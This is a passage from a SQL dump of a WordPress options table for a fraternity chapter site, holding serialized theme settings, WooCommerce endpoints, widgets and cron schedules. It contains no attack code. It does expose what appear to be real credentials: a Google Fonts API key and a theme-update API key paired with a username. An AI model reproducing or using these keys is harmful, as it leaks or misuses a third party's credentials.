portfolio-categories\";s:10:\"slug_cause\";s:5:\"cause\";s:19:\"slug_cause_taxonomy\";s:16:\"cause-categories\";s:10:\"slug_event\";s:5:\"event\";s:19:\"slug_event_taxonomy\";s:16:\"event-categories\";s:11:\"slug_sermon\";s:6:\"sermon\";s:20:\"slug_sermon_taxonomy\";s:17:\"sermon-categories\";}','yes'),(158,'hopeful_image_sizes','a:9:{s:4:\"grid\";a:3:{s:5:\"width\";s:3:\"450\";s:6:\"height\";s:3:\"350\";s:4:\"mode\";s:4:\"crop\";}s:10:\"thumbnails\";a:3:{s:5:\"width\";s:3:\"450\";s:6:\"height\";s:3:\"370\";s:4:\"mode\";s:4:\"crop\";}s:7:\"bigpost\";a:3:{s:5:\"width\";s:3:\"720\";s:6:\"height\";s:3:\"400\";s:4:\"mode\";s:4:\"crop\";}s:9:\"superpost\";a:3:{s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"350\";s:4:\"mode\";s:4:\"crop\";}s:6:\"single\";a:3:{s:5:\"width\";s:4:\"1140\";s:6:\"height\";s:4:\"9999\";s:4:\"mode\";s:6:\"resize\";}s:8:\"featarea\";a:3:{s:5:\"width\";s:3:\"920\";s:6:\"height\";s:3:\"440\";s:4:\"mode\";s:6:\"resize\";}s:6:\"slider\";a:3:{s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:3:\"650\";s:4:\"mode\";s:4:\"crop\";}s:8:\"carousel\";a:3:{s:5:\"width\";s:4:\"9999\";s:6:\"height\";s:3:\"400\";s:4:\"mode\";s:6:\"resize\";}s:8:\"timeline\";a:3:{s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"280\";s:4:\"mode\";s:6:\"resize\";}}','yes'),(159,'hopeful_layout','a:10:{s:13:\"single_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:11:\"page_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:11:\"blog_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:15:\"category_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:13:\"author_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:13:\"search_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:14:\"archive_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:11:\"tags_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:14:\"product_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}s:11:\"show_layout\";a:7:{s:7:\"sidebar\";a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";s:1:\"0\";}s:12:\"display-mode\";s:8:\"big-post\";s:4:\"grid\";a:5:{s:15:\"enable-carousel\";s:1:\"n\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}s:4:\"list\";a:4:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"thumbnails\";a:4:{s:15:\"enable-carousel\";s:1:\"n\";s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";s:6:\"gutter\";s:1:\"n\";}s:8:\"big-post\";a:5:{s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:11:\"image-split\";s:3:\"1-2\";s:13:\"related-posts\";s:1:\"n\";s:15:\"special-effects\";s:4:\"none\";}s:10:\"super-post\";a:2:{s:16:\"elements-per-row\";s:1:\"3\";s:15:\"special-effects\";s:4:\"none\";}}}','yes'),(160,'hopeful_styles','a:20:{s:12:\"boxed_layout\";s:1:\"N\";s:15:\"theme_custom_bg\";s:1:\"N\";s:16:\"theme_bg_pattern\";s:0:\"\";s:14:\"theme_bg_color\";s:7:\"#FFFFFF\";s:8:\"bg_image\";s:0:\"\";s:7:\"favicon\";s:75:\"https://zphiblgz.org/wp-content/uploads/2016/12/zetaphibeta_dove_blue-1.png\";s:14:\"facebook_image\";s:0:\"\";s:25:\"overlay_effect_for_images\";s:1:\"N\";s:19:\"overlay_effect_type\";s:4:\"dots\";s:15:\"sharing_overlay\";s:1:\"Y\";s:9:\"logo_type\";s:5:\"image\";s:8:\"logo_url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2014/12/zetaword.jpg\";s:11:\"retina_logo\";s:1:\"Y\";s:12:\"retina_width\";s:3:\"500\";s:13:\"retina_height\";s:3:\"165\";s:14:\"logo_font_name\";s:1:\"0\";s:16:\"logo_font_weight\";s:6:\"normal\";s:15:\"logo_font_style\";s:6:\"normal\";s:14:\"logo_font_size\";s:2:\"32\";s:9:\"logo_text\";s:7:\"Hopeful\";}','yes'),(161,'hopeful_colors','a:18:{s:18:\"general_text_color\";s:7:\"#3f4549\";s:10:\"link_color\";s:7:\"#2741a5\";s:16:\"link_color_hover\";s:7:\"#2741a5\";s:15:\"view_link_color\";s:7:\"#2741a5\";s:21:\"view_link_color_hover\";s:7:\"#656D78\";s:10:\"meta_color\";s:7:\"#2741a5\";s:13:\"primary_color\";s:7:\"#2741a6\";s:19:\"primary_color_hover\";s:7:\"#2741a6\";s:15:\"secondary_color\";s:7:\"#2558b3\";s:21:\"secondary_color_hover\";s:7:\"#2558b3\";s:18:\"primary_text_color\";s:7:\"#FFFFFF\";s:24:\"primary_text_color_hover\";s:7:\"#2558b3\";s:20:\"secondary_text_color\";s:7:\"#FFFFFF\";s:26:\"secondary_text_color_hover\";s:7:\"#2558b3\";s:16:\"submenu_bg_color\";s:7:\"#FFFFFF\";s:22:\"submenu_bg_color_hover\";s:7:\"#FFFFFF\";s:18:\"submenu_text_color\";s:7:\"#2741a6\";s:24:\"submenu_text_color_hover\";s:7:\"#2741a6\";}','yes'),(162,'hopeful_typography','a:5:{s:16:\"google_fonts_key\";s:39:\"AIzaSyBHh7VPOKMPw1oy6wsEs8FNtR5E8zjb-7A\";s:8:\"headings\";a:16:{s:4:\"type\";s:3:\"std\";s:9:\"font_name\";s:1:\"0\";s:12:\"font_subsets\";a:1:{i:0;s:5:\"latin\";}s:11:\"font_weight\";s:7:\"regular\";s:10:\"font_style\";s:7:\"regular\";s:2:\"h1\";a:6:{s:9:\"font_name\";s:1:\"0\";s:9:\"font_size\";s:2:\"52\";s:11:\"font_weight\";s:3:\"400\";s:10:\"font_style\";s:7:\"regular\";s:4:\"text\";s:7:\"Hopeful\";s:12:\"font_subsets\";a:1:{i:0;s:5:\"latin\";}}s:2:\"h2\";a:6:{s:9:\"font_name\";s:1:\"0\";s:9:\"font_size\";s:2:\"44\";s:11:\"font_weight\";s:3:\"400\";s:10:\"font_style\";s:7:\"regular\";s:4:\"text\";s:7:\"Hopeful\";s:12:\"font_subsets\";a:1:{i:0;s:5:\"latin\";}}s:2:\"h3\";a:6:{s:9:\"font_name\";s:1:\"0\";s:9:\"font_size\";s:2:\"38\";s:11:\"font_weight\";s:3:\"400\";s:10:\"font_style\";s:7:\"regular\";s:4:\"text\";s:7:\"Hopeful\";s:12:\"font_subsets\";a:1:{i:0;s:5:\"latin\";}}s:2:\"h4\";a:6:{s:9:\"font_name\";s:1:\"0\";s:9:\"font_size\";s:2:\"32\";s:11:\"font_weight\";s:3:\"400\";s:10:\"font_style\";s:7:\"regular\";s:4:\"text\";s:7:\"Hopeful\";s:12:\"font_subsets\";a:1:{i:0;s:5:\"latin\";}}s:2:\"h5\";a:6:{s:9:\"font_name\";s:1:\"0\";s:9:\"font_size\";s:2:\"26\";s:11:\"font_weight\";s:3:\"400\";s:10:\"font_style\";s:7:\"regular\";s:4:\"text\";s:7:\"Hopeful\";s:12:\"font_subsets\";a:1:{i:0;s:5:\"latin\";}}s:4:\"text\";s:7:\"Hopeful\";s:8:\"font_eot\";s:0:\"\";s:8:\"font_svg\";s:0:\"\";s:8:\"font_ttf\";s:0:\"\";s:9:\"font_woff\";s:0:\"\";s:11:\"font_family\";s:0:\"\";}s:12:\"primary_text\";a:11:{s:4:\"type\";s:3:\"std\";s:9:\"font_name\";s:1:\"0\";s:12:\"font_subsets\";a:1:{i:0;s:5:\"latin\";}s:11:\"font_weight\";s:7:\"regular\";s:10:\"font_style\";s:7:\"regular\";s:4:\"text\";s:54:\"Hopeful is a really nice WordPress Theme by TouchSize.\";s:8:\"font_eot\";s:0:\"\";s:8:\"font_svg\";s:0:\"\";s:8:\"font_ttf\";s:0:\"\";s:9:\"font_woff\";s:0:\"\";s:11:\"font_family\";s:0:\"\";}s:14:\"secondary_text\";a:11:{s:4:\"type\";s:3:\"std\";s:9:\"font_name\";s:1:\"0\";s:12:\"font_subsets\";a:1:{i:0;s:5:\"latin\";}s:11:\"font_weight\";s:7:\"regular\";s:10:\"font_style\";s:7:\"regular\";s:4:\"text\";s:7:\"Hopeful\";s:8:\"font_eot\";s:0:\"\";s:8:\"font_svg\";s:0:\"\";s:8:\"font_ttf\";s:0:\"\";s:9:\"font_woff\";s:0:\"\";s:11:\"font_family\";s:0:\"\";}s:5:\"icons\";s:1999:\"icon-noicon,icon-image,icon-comments,icon-delete,icon-rss,icon-drag,icon-down,icon-up,icon-layout,icon-import,icon-play,icon-desktop,icon-social,icon-empty,icon-filter,icon-money,icon-flickr,icon-pinterest,icon-user,icon-video,icon-close,icon-link,icon-views,icon-quote,icon-pencil,icon-page,icon-post,icon-category,icon-time,icon-left,icon-right,icon-palette,icon-code,icon-sidebar,icon-vimeo,icon-lastfm,icon-logo,icon-heart,icon-list,icon-attention,icon-menu,icon-delimiter,icon-image-size,icon-settings,icon-share,icon-resize-vertical,icon-text,icon-movie,icon-dribbble,icon-yahoo,icon-facebook,icon-twitter,icon-tumblr,icon-gplus,icon-skype,icon-linkedin,icon-tick,icon-edit,icon-font,icon-home,icon-button,icon-wordpress,icon-music,icon-mail,icon-lock,icon-search,icon-github,icon-basket,icon-star,icon-link-ext,icon-award,icon-signal,icon-target,icon-attach,icon-download,icon-upload,icon-mic,icon-calendar,icon-phone,icon-headphones,icon-flag,icon-credit-card,icon-save,icon-megaphone,icon-key,icon-euro,icon-pound,icon-dollar,icon-rupee,icon-yen,icon-rouble,icon-try,icon-won,icon-bitcoin,icon-anchor,icon-support,icon-blocks,icon-block,icon-graduate,icon-shield,icon-window,icon-coverflow,icon-flight,icon-brush,icon-resize-full,icon-news,icon-pin,icon-params,icon-beaker,icon-delivery,icon-bell,icon-help,icon-laptop,icon-tablet,icon-mobile,icon-thumb,icon-briefcase,icon-direction,icon-ticket,icon-chart,icon-book,icon-print,icon-on,icon-off,icon-featured-area,icon-team,icon-login,icon-clients,icon-tabs,icon-tags,icon-gauge,icon-bag,icon-key,icon-glasses,icon-ok-full,icon-restart,icon-recursive,icon-shuffle,icon-ribbon,icon-lamp,icon-flash,icon-leaf,icon-chart-pie-outline,icon-puzzle,icon-fullscreen,icon-downscreen,icon-zoom-in,icon-zoom-out,icon-pencil-alt,icon-down-dir,icon-left-dir,icon-right-dir,icon-up-dir,icon-circle-outline,icon-circle-full,icon-dot-circled,icon-threedots,icon-colon,icon-down-micro,icon-cancel,icon-medal,icon-square-outline,icon-rhomb,icon-rhomb-outline\";}','yes'),(163,'hopeful_single_post','a:12:{s:13:\"related_posts\";s:1:\"Y\";s:23:\"number_of_related_posts\";i:6;s:27:\"related_posts_nr_of_columns\";i:3;s:18:\"related_posts_type\";s:10:\"thumbnails\";s:32:\"related_posts_selection_criteria\";s:7:\"by_tags\";s:14:\"social_sharing\";s:1:\"Y\";s:9:\"post_tags\";s:1:\"Y\";s:9:\"post_meta\";s:1:\"Y\";s:15:\"post_pagination\";s:1:\"Y\";s:9:\"show_more\";s:1:\"y\";s:18:\"display_author_box\";s:1:\"n\";s:11:\"breadcrumbs\";s:1:\"y\";}','yes'),(164,'hopeful_page','a:3:{s:14:\"social_sharing\";s:1:\"N\";s:9:\"post_meta\";s:1:\"Y\";s:11:\"breadcrumbs\";s:1:\"y\";}','yes'),(165,'hopeful_social','a:17:{s:5:\"email\";s:23:\"membership@zphiblgz.org\";s:5:\"skype\";s:0:\"\";s:6:\"github\";s:0:\"\";s:5:\"gplus\";s:0:\"\";s:7:\"dribble\";s:0:\"\";s:6:\"lastfm\";s:0:\"\";s:8:\"linkedin\";s:0:\"\";s:6:\"tumblr\";s:0:\"\";s:7:\"twitter\";s:32:\"http://www.twitter.com/zphib_lgz\";s:5:\"vimeo\";s:0:\"\";s:9:\"wordpress\";s:0:\"\";s:5:\"yahoo\";s:0:\"\";s:7:\"youtube\";s:0:\"\";s:8:\"facebook\";s:32:\"http://www.facebook.com/zphiblgz\";s:6:\"flickr\";s:0:\"\";s:9:\"pinterest\";s:0:\"\";s:9:\"instagram\";s:0:\"\";}','yes'),(166,'hopeful_theme_update','a:1:{s:14:\"update_options\";a:2:{s:9:\"user_name\";s:9:\"zphib_lgz\";s:7:\"key_api\";s:32:\"ilapll39o835y8yk8z2ctl7gq3tfa8ux\";}}','yes'),(167,'hopeful_theme_advertising','a:2:{s:9:\"ad_area_1\";s:0:\"\";s:9:\"ad_area_2\";s:0:\"\";}','yes'),(168,'hopeful_css','a:1:{s:3:\"css\";s:92:\".teams article .image-holder,\r\n.teams article .article-title {\r\n    pointer-events: none;\r\n}\";}','yes'),(169,'hopeful_sidebars','a:2:{s:24:\"ts-sidebar-586bd3ee2d53c\";s:3:\"BOG\";s:24:\"ts-sidebar-5875a66db9e4b\";s:9:\"MailChimp\";}','yes'),(170,'hopeful_impots_options','a:0:{}','yes'),(171,'hopeful_red_area','a:4:{s:4:\"news\";s:2213:\"<ul><li><a href=\"http://demo.touchsize.com/themes/?theme=shootback\" target=\"_blank\">Shootback has been launched</a><em>March 17th, 2015 at 12:43</em>\n				<img src=\"http://demo.touchsize.com/shootback/wp-content/themes/shootback/images/logo.png\" /><p>We launched our new photography WordPress theme! Clean, simple and with the drag and drop features it is just amazing!</p>\n			</li>\n<li><a href=\"http://demo.touchsize.com/themes/?theme=esquise\" target=\"_blank\">You must try Esquise</a><em>March 3rd, 2015 at 15:43</em>\n				<img src=\"http://demo.touchsize.com/esquise/wp-content/themes/esquise/images/logo.png\" /><p>We launched our new magazine WordPress theme, and it\\\'s very pretty. Go check it out!</p>\n			</li>\n<li><a href=\"http://demo.touchsize.com/themes/?theme=videotouch\" target=\"_blank\">Go get VideoTouch right now!</a><em>November 4th, 2014 at 15:43</em>\n				<img src=\"http://demo.touchsize.com/videotouch/wp-content/themes/videotouch/images/logo.png\" /><p>Codmark is now up for grabs! Go get your copy now on our website! http://touchsize.com</p>\n			</li>\n<li><a href=\"http://demo.touchsize.com/themes/?theme=codmark\" target=\"_blank\">Codmark is available for download</a><em>October 13th, 2014 at 11:43</em>\n				<img src=\"http://redcodn.com/wp-content/uploads/2014/10/codmark-banner.jpg\" /><p>Codmark is now live! Get a copy of the most powerful theme that we have ever done here http://bit.ly/ZnbocK</p>\n			</li>\n<li><a href=\"http://demo.touchsize.com/fontana\" target=\"_blank\">Getting Fontana ready</a><em>June 17th, 2014 at 15:43</em>\n				<img src=\"http://demo.touchsize.com/fontana/wp-content/uploads/sites/7/2014/06/fontana_logo.jpg\" /><p>We are getting close to launching our new drag and drop enabled WordPress theme. It should be ready for action soon! Check the demo on the link!</p>\n			</li>\n<li><a href=\"http://touchsize.com\" target=\"_blank\">Welcome to TouchSize</a><em>June 1st, 2014 at 15:43</em>\n				<img src=\"http://touchsize.com/wp-content/themes/touchsize/images/logo.png\" /><p>Welcome to TouchSize Admin Panel. This is our first news item. We are really glad you are using our product. Please make sure to write us any suggestions and bug reports at touchsize@gmail.com</p>\n			</li></ul>\";s:5:\"alert\";N;s:13:\"hidden_alerts\";a:3:{i:0;s:2:\"20\";i:1;s:2:\"25\";i:2;s:2:\"26\";}s:4:\"time\";i:1632334354;}','yes'),(363,'woocommerce_myaccount_delete_payment_method_endpoint','delete-payment-method','yes'),(364,'woocommerce_myaccount_set_default_payment_method_endpoint','set-default-payment-method','yes'),(365,'woocommerce_myaccount_page_id','105','yes'),(366,'woocommerce_enable_signup_and_login_from_checkout','no','no'),(367,'woocommerce_enable_myaccount_registration','no','no'),(368,'woocommerce_enable_checkout_login_reminder','no','no'),(369,'woocommerce_registration_generate_username','no','no'),(370,'woocommerce_registration_generate_password','no','no'),(371,'woocommerce_myaccount_orders_endpoint','orders','yes'),(372,'woocommerce_myaccount_view_order_endpoint','view-order','yes'),(174,'recently_activated','a:0:{}','yes'),(142487,'tml_login_type','email','no'),(27899,'cause_categories_children','a:0:{}','yes'),(177,'sermon_categories_children','a:0:{}','yes'),(46271,'event_categories_children','a:1:{i:44;a:1:{i:0;i:70;}}','yes'),(179,'videos_categories_children','a:0:{}','yes'),(58550,'teams_children','a:0:{}','yes'),(181,'portfolio_register_post_type_children','a:0:{}','yes'),(182,'ts_pricing_table_categories_children','a:0:{}','yes'),(99,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'cron','a:34:{i:1601256962;a:1:{s:10:\"itsec_cron\";a:0:{}}i:1632343140;a:1:{s:16:\"icwp-wpsf-hourly\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1632343583;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1632344474;a:1:{s:26:\"um_hourly_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1632344823;a:1:{s:38:\"hustle_general_data_protection_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1632344882;a:1:{s:10:\"itsec_cron\";a:1:{s:32:\"12ca8767a64eac20d01836398698c811\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:1:{i:0;s:11:\"flush-files\";}s:8:\"interval\";i:3600;}}}i:1632353164;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}